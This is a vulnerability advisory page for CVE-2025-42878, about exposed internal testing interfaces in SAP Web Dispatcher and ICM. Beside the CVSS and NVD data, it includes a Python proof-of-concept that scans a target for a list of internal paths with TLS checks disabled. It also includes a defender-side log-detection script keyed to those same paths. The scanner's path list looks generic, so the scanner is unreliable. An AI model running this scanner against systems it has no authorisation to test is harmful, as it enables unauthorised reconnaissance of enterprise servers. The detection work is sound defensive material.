Security Vulnerability Report
CVE-2025-42878 CVSS 8.2 HIGH

CVE-2025-42878

Published: 2025-12-09 16:17:52
Last Modified: 2026-04-15 00:35:42

Description

SAP Web Dispatcher and ICM may expose internal testing interfaces that are not intended for production. If enabled, unauthenticated attackers could exploit them to access diagnostics, send crafted requests, or disrupt services. This vulnerability has a high impact on confidentiality and availability and a low impact on integrity of the application.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:H
Weakness: CWE-1244 (as recorded in the raw JSON data at the end of this report)

Configurations (Affected Products)

No configuration data available.

SAP Web Dispatcher - all versions without the security patch applied
SAP ICM (Internet Communication Manager) - all versions without the security patch applied
For the specific affected versions, see SAP Security Note 3684682.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-42878 PoC - SAP Web Dispatcher/ICM Internal Interface Access
# This PoC demonstrates accessing exposed internal testing interfaces
import requests
import sys

TARGET_HOST = "https://target-sap-system.com"


def test_exposed_interfaces():
    """Test for exposed SAP Web Dispatcher/ICM internal testing interfaces"""
    # Common internal testing interface paths
    test_paths = [
        "/sap/admin/public/default.html",
        "/sap/admin/test/info",
        "/sap/diag/test",
        "/sap/icm/test",
        "/sap/webdisp/test",
        "/sap/icm/trace",
        "/sap/icm/config",
        "/sap/admin/cgi",
        "/sap/startsrv",
        "/sap/monitor",
        "/sap/techsupport",
        "/sap/debug",
    ]
    print(f"[*] Scanning {TARGET_HOST} for exposed internal interfaces...")
    for path in test_paths:
        url = f"{TARGET_HOST}{path}"
        try:
            # verify=False as in the original PoC: TLS certificate checks are skipped
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {url} - Interface exposed!")
                print(f"    Status: {response.status_code}")
                print(f"    Content-Type: {response.headers.get('Content-Type', 'N/A')}")
            elif response.status_code in (401, 403):
                print(f"[-] Protected: {url}")
            else:
                print(f"[*] Checking: {url} - Status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {url}: {e}")


def test_diagnostic_endpoints():
    """Test for diagnostic and info endpoints that may leak information"""
    diagnostic_paths = [
        "/sap/icm/info",
        "/sap/webdisp/info",
        "/sap/admin/status",
        "/sap/trace/active",
        "/sap/conn/active",
    ]
    print("\n[*] Checking diagnostic endpoints...")
    for path in diagnostic_paths:
        url = f"{TARGET_HOST}{path}"
        try:
            response = requests.get(url, timeout=10, verify=False)
            if "SAP" in response.text or response.status_code == 200:
                print(f"[+] Info leak: {url}")
                print(f"    Response length: {len(response.text)} bytes")
        except requests.exceptions.RequestException:
            # The original used a bare "except: pass"; narrowed to request errors
            pass


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_HOST = sys.argv[1]
    test_exposed_interfaces()
    test_diagnostic_endpoints()
    print("\n[*] Scan complete. If vulnerable interfaces found, apply SAP Security Note 3684682")
```
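A defender-side counterpart to the PoC above, added here and not part of the original report: it reads HTTP access log lines, picks out requests to the internal and diagnostic paths the PoC probes, and reports per source address which of them were answered with a 2xx (an interface that is actually reachable) versus only 401/403/404 (probing that the server turned away). The log lines are constructed for this example and use Common Log Format; the layout of an ICM or Web Dispatcher HTTP access log is configurable, so the regular expression is an assumption that has to be adapted to the format actually in use. The path prefixes are taken from the PoC's two path lists.

```python
import re
from collections import defaultdict

# Prefixes covering the internal/test paths probed by the PoC above. A 2xx
# answer to any of these on a production Web Dispatcher/ICM merits an alert.
INTERNAL_PATH_PREFIXES = (
    "/sap/admin/",
    "/sap/diag/",
    "/sap/icm/",
    "/sap/webdisp/",
    "/sap/startsrv",
    "/sap/monitor",
    "/sap/techsupport",
    "/sap/debug",
    "/sap/trace/",
    "/sap/conn/",
)

# Constructed sample access log in Common Log Format (assumed layout, not an
# SAP default): one source finds two reachable interfaces, the other is blocked.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2025:08:01:12 +0000] "GET /sap/bc/ping HTTP/1.1" 200 512
203.0.113.10 - - [10/Dec/2025:08:01:13 +0000] "GET /sap/admin/public/default.html HTTP/1.1" 200 2048
203.0.113.10 - - [10/Dec/2025:08:01:13 +0000] "GET /sap/icm/trace HTTP/1.1" 200 9731
203.0.113.10 - - [10/Dec/2025:08:01:14 +0000] "GET /sap/debug HTTP/1.1" 404 0
198.51.100.7 - - [10/Dec/2025:08:02:40 +0000] "GET /sap/admin/status HTTP/1.1" 401 0
198.51.100.7 - - [10/Dec/2025:08:02:41 +0000] "GET /sap/monitor HTTP/1.1" 403 0
"""

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_log(text):
    """Yield one dict per parseable log line; unparseable lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def is_internal_path(path):
    """True if the request path (query string ignored) is an internal/test path."""
    path = path.split("?", 1)[0]
    return path.startswith(INTERNAL_PATH_PREFIXES)


def detect(text):
    """Group hits on internal paths by source IP.

    Returns {ip: {"probes": <count of requests to internal paths, any status>,
                  "exposed": [paths that were answered with a 2xx, in log order]}}
    """
    findings = defaultdict(lambda: {"exposed": [], "probes": 0})
    for rec in parse_log(text):
        if not is_internal_path(rec["path"]):
            continue
        entry = findings[rec["ip"]]
        entry["probes"] += 1
        if rec["status"].startswith("2"):
            entry["exposed"].append(rec["path"])
    return dict(findings)


if __name__ == "__main__":
    for ip, entry in detect(SAMPLE_LOG).items():
        verdict = "EXPOSED" if entry["exposed"] else "blocked"
        print(f"{ip}: {entry['probes']} probes, {verdict} {entry['exposed']}")
```

The "exposed" list is the actionable part: a source that only collects 401/403/404 responses shows that someone is looking, while a 2xx on one of these paths shows that an interface the note says should not be reachable in production is answering, so both conditions are worth separate alert severities.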

References

https://me.sap.com/notes/3684682
https://url.sap/sapsecuritypatchday

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-42878", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:52.230", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Web Dispatcher and ICM may expose internal testing interfaces that are not intended for production. If enabled, unauthenticated attackers could exploit them to access diagnostics, send crafted requests, or disrupt services. This vulnerability has a high impact on confidentiality, availability and low impact on integrity and of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1244"}]}], "references": [{"url": "https://me.sap.com/notes/3684682", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
```